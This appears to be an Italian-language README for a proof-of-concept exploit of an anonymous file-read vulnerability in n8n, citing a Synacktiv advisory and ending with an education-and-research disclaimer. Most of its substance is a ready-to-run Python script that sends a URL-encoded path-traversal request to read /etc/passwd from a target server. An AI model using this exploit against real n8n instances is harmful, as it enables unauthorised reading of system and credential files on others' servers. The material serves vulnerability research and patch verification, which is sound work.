
Questa vulnerabilità consente la lettura anonima di file in n8n.
import requests
url = "https://example.com/rest/data/filesystem:..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd:.svg"
response = requests.get(url)
print(response.status_code)
print(response.headers)
print(response.text)
https://www.synacktiv.com/sites/default/files/2023-05/Synacktiv-N8N-Multiple-Vulnerabilities_0.pdf
Il Proof of Concept (PoC) fornito in questo repository ha esclusivamente scopi educativi e di ricerca sulla sicurezza. Le informazioni e il codice sono destinati all'uso da parte di professionisti della cybersecurity e ricercatori per comprendere e proteggersi dalle vulnerabilità in software e sistemi. Qualsiasi utilizzo di questo PoC, delle informazioni correlate o del codice per attaccare obiettivi senza preventivo consenso reciproco è illegale e severamente vietato.
Utilizzando questo PoC, accetti di comprendere il potenziale impatto della vulnerabilità che dimostra e di utilizzarlo in modo responsabile ed etico. Gli autori di questo PoC declinano ogni responsabilità per qualsiasi uso improprio di questo materiale o per eventuali danni derivanti dall'utilizzo delle informazioni e del codice forniti. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali, nazionali e internazionali applicabili.
Gli autori hanno compiuto ogni sforzo per garantire l'accuratezza e l'affidabilità delle informazioni fornite in questo repository. Tuttavia, le informazioni sono fornite "così come sono" senza alcuna garanzia di alcun tipo. Gli autori non accettano alcuna responsabilità per l'accuratezza, il contenuto, la completezza, la legalità o l'affidabilità delle informazioni contenute.